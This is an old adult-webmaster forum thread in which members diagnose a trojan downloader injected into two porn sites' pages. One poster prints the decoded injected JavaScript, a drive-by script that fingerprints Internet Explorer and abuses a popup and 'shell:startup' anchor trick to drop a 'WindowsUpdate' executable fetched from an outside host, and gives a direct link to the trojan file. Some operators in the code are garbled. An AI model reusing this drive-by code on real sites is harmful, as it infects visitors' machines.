cosis

I was submitting galleries today and noticed a Trojan virus detected when loading both the main pages on pornno.com and snakesworld.com. I consider my computer pretty secure. Anyone else noticing this?

Jeff aka NIGHTfall

havent noticed... and im not going to go looking for them

__________________

Register Now For PimpinPays.com

cosis

hehe - only wondering because I already have done a few spyware scans and nothing was detected so I believe it's not on my poc

Spunky

What spyware programs are you using?..all those free ones do not completly remove them..I have them all and they do find most but not all of them..BTW I looked and didn't get any warnings,I'm guessing it's on your box

__________________

cosis

I use adaware and spybot, I just had a friend visit the sites and got the same virus alerts... I guess you would need Norton to see them

GirlNinja

yeah whever i go out to find more TGPs to submit to, that usually happens. sucks

Spunky

It took a minute but I did get a warning on snakesworld...I have norton as well...maybe he doesn't know he has it

__________________

beemk

they are both hosted by candid..... hmmmm

__________________
I host with Vacares

Thurbs

just use firefox to solve those problems at the source.

BlueQuartz

yep i get em too

Snake

Hey, you shouldn't be getting any virus alerts. I think you may be infected with some shit. I don't get the warnings and I'm using Norton also.
Did you check your system for "snakesworld" or "pornno".

Also, run CWShredder and see what happens.
Get it here
http://www.spywareinfo.com/~merijn/downloads.html

If you can't get to this page you're infected. If you can download CWShredder and let me know what happens.

If you get the same shit, I'll dig some more.
Thanks,
Snake

Torcida

I have had this problems! Some tgps on webmaster page (submission page) have viruses and spywares! Install some antivirus, spaywer remover and firewall!

__________________

Germes

Yes, Cosis, you are right.
And pornno.com and snakesworld.com install the same Trojan.DownLoader version from rockyspornpalace.com
First downloaded file name is WindowsUpdate[random number].exe

Here is javascript line which creates URL:

burl="http://www.rockyspornpalace.com/ad/banners/29406/82404/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";


beemk, snakesworld has it at the bottom of page but upper then </BODY> tag, pornno has it in the begining of Asians section, so I doubt host can do it.

I do not think they are hackers of course, looks like they do it for money.

thurbs, you are right, here is function from snakesworld/pornno trojan downloader which decides to download trojan or not:

function BadBrowser()
{
if(navigator.appName!="Microsoft Internet Explorer")
return 1;
if(!navigator.cookieEnabled)
return 1;
if(navigator.platform!="Win32")
return 1;
if(navigator.userAgent.indexOf("MSIE 5.5")hahahaha-1 && navigator.userAgent.indexOf("MSIE 6.")hahahaha-1)
return 1;
if(document.cookie.indexOf("msip=6x")>-1)
return 1;
}


Snake, if your site IP is not 64.158.30.220 check your nameserver.

__________________
http://www.germesia.com/

steve90

yes i get that shit all the time pretty annoying never gets past the scanner though

FreeFastHost

I get the alert when I go to snakesworld as well.

mGreg

Anyone know what these trojans do? Turn machines into spam boxes?

Germes

mGreg,

name Trojan.DownLoader shows, this program does nothing itself, just opens the door for ANY trojans.

Zillion people scan the Net to find infected computers, then they install on your comp whatever they want, but first of all they download all your passwords.

Read here:
http://www.viruslibrary.com/virusinf...Downloader.htm

__________________
http://www.germesia.com/

Shoehorn!

I had some nasty shit installed while doing movie galleries. Don't remember what site it was, but it fucked my shit up for awhile. Just watch yourself, it's a crazy world out there man.

__________________

mGreg

Thanks for the info!

Snake

I'd like to see the source code you guys are seeing. I'm not doing this for money, who the fuck is Rocky's Porn Palace anyway?
I think your computers are infected, cause I see nothing on my end. I see nothing on the server or in the source or the page when I look at it, unless it's some of that new "invisible text"....


Where on my page do you see the code?

How long has this been happening?

Do you think the js code for Nasty's Camcrush link could be hijacked? or just the cause of Norton alerts.

I get nothing here on my end. The only thing I've changed is that link to Camcrush and now I'm getting complaints.

Help me out here.
Thanks
Snake

fusionx

Hi Snake,

Clear your cookies (at least from snakesworld.com) and load your main page - then view source. You'll see a block of encoded javascript at the bottom, just beneath your copyright.

I've done this twice to be sure - without clearing cookies, it happens once, then everything is fine. Clear the cookie, and it comes back the next time you load the page.

I'd post the javascript here, but I don't know what would happen :-)

Snake

Cleared cookies and don't see it. I think you have a virus in your machine. It's definately not being done purposely on my end. Check my page again, I'll remove the js bullshit and let me know if it happens again.
thanks,
Snake

cosis

Hi Snake,

I no longer see it on your page, but if you look at pornno.com in the "Asians" section of the html you will see it.

Have you re-uploaded your links.html file recently? That might be why it's not showing right now.

fusionx

I pulled this from links.html just a few minutes ago.


Hey - I know you are not doing it on purpose - just trying to help ya out :-)

Germes

Snake, this code was found on snakesworld and pornno from many machines (mostly UNIX), so I doubt they all could be infected.

Please show us code you have between

Copyright
1997-2004</FONT></FONT>
</CENTER>

and

</BODY></HTML>

We all see there encoded javascript.
Here you can see this script decoded:

var pop;
var uploaded;
var obj;
var burl;
var hiddenImg;
var totalobj;

function BadBrowser()
{
if(navigator.appName!="Microsoft Internet Explorer")
return 1;
if(!navigator.cookieEnabled)
return 1;
if(navigator.platform!="Win32")
return 1;
if(navigator.userAgent.indexOf("MSIE 5.5")hahahaha-1 && navigator.userAgent.indexOf("MSIE 6.")hahahaha-1)
return 1;
if(document.cookie.indexOf("msip=6x")>-1)
return 1;
}

uploaded=BadBrowser();


if(!uploaded)
{
burl="http://www.rockyspornpalace.com/ad/banners/29406/82405/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";
}

function initpop()
{
if(!pop)
{
pop=window.createPopup();
var oBody = pop.document.body;


pop.document.bgColor="black";
oBody.style.border = "solid black 0px";
oBody.style.position="absolute";
oBody.style.left= "0";
oBody.style.top= "0";
var temp;
temp='<DIV style="position:relative;"><a href="'+"#\" onBlur='parent.document.getElementById(\"i_frame\" ).style.visibility=\"hidden\"' ";
temp+=
"onMouseOut='document.getElementById(\"client\").s tyle.visibility=\"hidden\"' \
OnMouseOver='document.getElementById(\"client\").s tyle.visibility=\"visible\"' \
onMouseDown='parent.document.getElementById(\"i_fr ame\").style.visibility=\"visible\";parent.pop.sho w(1,1,1,1);parent.uploaded=1;parent.DoClick();'> \
I\
<DIV ID=\"client\" STYLE=\"visibility:hidden; position:absolute; top:-25; left:-25;\">\
<img nocache border=1 style=\"width=500px;heigth=500px; cursor:hand;\" dynsrc=\""+burl+"\" ></div></a></div>";


oBody.innerHTML=temp;
}
}

function clean()
{
uploaded=1;
if(pop)
pop.hide();
}

if(!uploaded)
{
initpop();
window.onbeforeunload=clean;
}


function DoClick()
{
document.cookie="msip=6x; path=/; expires=Mon, 31 Dec 2005 23:59:59 UTC;";
window.setTimeout('obj.click();',300);
}

function showpop()
{
if(uploaded)
return;
obj=window.event.srcElement;
if(!pop)
{
initpop();
}

pop.show(window.event.screenX,window.event.screenY ,1,1);
document.getElementById("i_frame").style.left=wind ow.event.screenX-window.screenLeft-document.body.clientLeft+document.body.scrollLeft;
document.getElementById("i_frame").style.top=windo w.event.screenY-window.screenTop-document.body.clientTop+document.body.scrollTop;
}


function SetAllEvents()
{
if(pop.document.readyStatehahahaha"complete" && totalobj!=document.all.length)
{
totalobj=document.all.length;
for(i = 0; i < document.all.length; i++){
if(document.all(i).tagNamehahahaha"A" && document.all(i).id!="clientcall")
document.all(i).onmousemove=showpop;}
}
setTimeout("SetAllEvents();", 400);
}

if(!uploaded)
{
setTimeout("SetAllEvents();", 400);
window.setTimeout('window.defaultStatus=" "',2000);

document.write('<div id=i_frame name=i_frame STYLE="visibility:hidden;position:absolute;top=0;l eft=0;width:1;height:1;overflow:hidden"><iframe frameborder="1" name="clientframe" id="clientframe" style="position:relative;top=-250;left=-440;width:700;height:700;"></iframe></div>');
document.write('<a folder="shell:startup" target="clientframe" id="clientcall" style="visibility:hidden;display:none;behavior:url (#default#AnchorClick);"></a>');
document.getElementById("clientcall").click();
document.write('<iframe src="about:blank" style="visibility:hidden;display:none;"></iframe>');
}

__________________
http://www.germesia.com/

the Shemp

Germes, when i look at snakes source, i dont see any code in that spot..

__________________
i use Vacares...so should you
Submit your picture galleries to my site...Outlaw TGP

Snake

Germes,
There is no code on my pages between the area you mentioned.
I think when I had the .js script on there for NastyDollars Cam site it was exploited by a js exploit. I'm not an expert but it seems to only affect certain machines.
I see Pornno.com also runs a few .js scripts and I do see the jscript encode in his source, but not on my pages.

Can you take a look in my archives where I only have the "Adult Friend Finder" link at the bottom
http://www.snakesworld.com/oct1618.html

and tell me if you see the same shit. If not, I think "Rocky" has a little explaining to do.

BTW, I know you guys are trying to help and I appreciate it.

Germes

Hello Shemp!

Sometimes I do not see it too.
A few minutes later I see it from the same IP.
Clean up cookies and try again.

__________________
http://www.germesia.com/

the Shemp

thanks Germes, this is very perplexing...

__________________
i use Vacares...so should you
Submit your picture galleries to my site...Outlaw TGP

fusionx

I just bit the bullet and loaded up rockyspornpalace.. nothing major, but massive popups...

Spunky

It's gone now..

__________________

Germes

Snake,

page http://www.snakesworld.com/oct1618.html
looks clean for me.

If you do not have any code on the page, check httpd.conf and .htaccess files

There are not too many ways to insert code

__________________
http://www.germesia.com/

Snake

I removed the .js from my page earlier, is anyone still seeing the jscript encode?

I emailed Pornno, but don't know if I have the right contact info, if anyone has it they should let him know what's up.


Also, Shemp this is perplexing to me also, but what' s worse is I may actually break 50 posts on GFY after all these years!

fusionx

If you can't see the code, and don't get the virus/trojan notification from Norton (assuming you do have norton installed) try changing your IE settings to request a new copy of the page each visit. eg; Tools->Internet Options->Temporary Internet Files-->Settings-->Every Visit

When I do this I get the code and the norton popups every time I refresh the links.html page.

the Shemp

hehe, i never thought you would get to 50 posts ;)

__________________
i use Vacares...so should you
Submit your picture galleries to my site...Outlaw TGP

Germes

spunky, no, it is back

fusionx, try to download
http://www.rockyspornpalace.com/ad/banners/29406/82404/WindowsUpdate31327.exe
but be careful, it is trojan

Shemp, yes, cheaters are smart.
BTW, gallery http://www.darkestelf.com/dp19t.htm on your TGP redirects to http://stats.yourownfreehost.com/redir.php?buyer_id=147&userid=cheyenne&is_u=0

__________________
http://www.germesia.com/

thp

Snake I just visited your page and got 3 prompts from mcafree for trojans, I looked at your source and saw the code at the very bottom of your page. This is after your camcrush links were removed.

Germes

Sorry, Snake, but I still can see this code

__________________
http://www.germesia.com/

Spunky

Hmmm.deleted cookies and went here... http://www.snakesworld.com/links.html
...seemed fine here,no trojan warnings

__________________

cosis

I tried clearing cookies and such and do not see it loading anymore. Could it just load for certain ip blocks?

fusionx

I was able to download it, but it downloaded as a 0 (zero) byte file.

I have about 20 of them in my temp files directory. They are 9kb in size.

I copied it to an old machine and ran it just for fun.

All it did was open a URL in my browser to download the same file. (same URL at rockys).

Nothing new is running in system processes. I'm running a full scan with norton, and I'll also run one with AVG and AdAware just to check.

I'm not at all sure what it's supposed to be doing.

According to Symantec, the class "trojan horse" is just a generic label when they don't really know what it is. The classification is based on behavior, not contents.

It seems pretty harmless, so far. Just a pain in the butt.

Spunky

Still fucking sucks..surfers freak out and close the page instantly regardless if it is harmless..

__________________

the Shemp

is anyone else getting a redirection on this gallery?
http://www.darkestelf.com/dp19t.htm

__________________
i use Vacares...so should you
Submit your picture galleries to my site...Outlaw TGP

Germes

Usually programs like this can remember IP.
Just checked from UNIX (new IP), code is still there.

fusionx, second time from the same URL they upload to your comp another program. Read about trojans somewhere else, they are not harmless.

__________________
http://www.germesia.com/

Germes

Shemp, it is traffic-shop hosting, they redirect a few percents of traffic

__________________
http://www.germesia.com/

Spunky

Seems cool with I.E. no redirects

__________________

Lace

I just got a popup from norton with the trojan....Shit is still on there..

And I have paid versions of a few nice spyware scanners and I scanned earlier today along with norton so I have noting on my machine...Well now I do.

__________________
Your Paysite Partner
Strength In Numbers!
StickyDollars | RadicalCash | KennysPennies | HomegrownCash

fusionx

Oh - I don't mean trojans in general, I mean this particular file isn't doing much except downloading itself - at least so far.

I checked my system registry and there's nothing new in the Run, RunOnce or RunAsService keys.

It is odd that I can't find anything on the web that describes a trojan or any hijack attempt that creates a file named this way (windowsupdatexxxxx.exe).

the Shemp

yup, thanks bro...looks like one preferred submitter gets gassed tonite...

__________________
i use Vacares...so should you
Submit your picture galleries to my site...Outlaw TGP

Yngwie

it didn't redirect for me

__________________
ICQ: 16544251 - Skype: gator37 @ eastlink.ca - email: yngwie @ isys.ca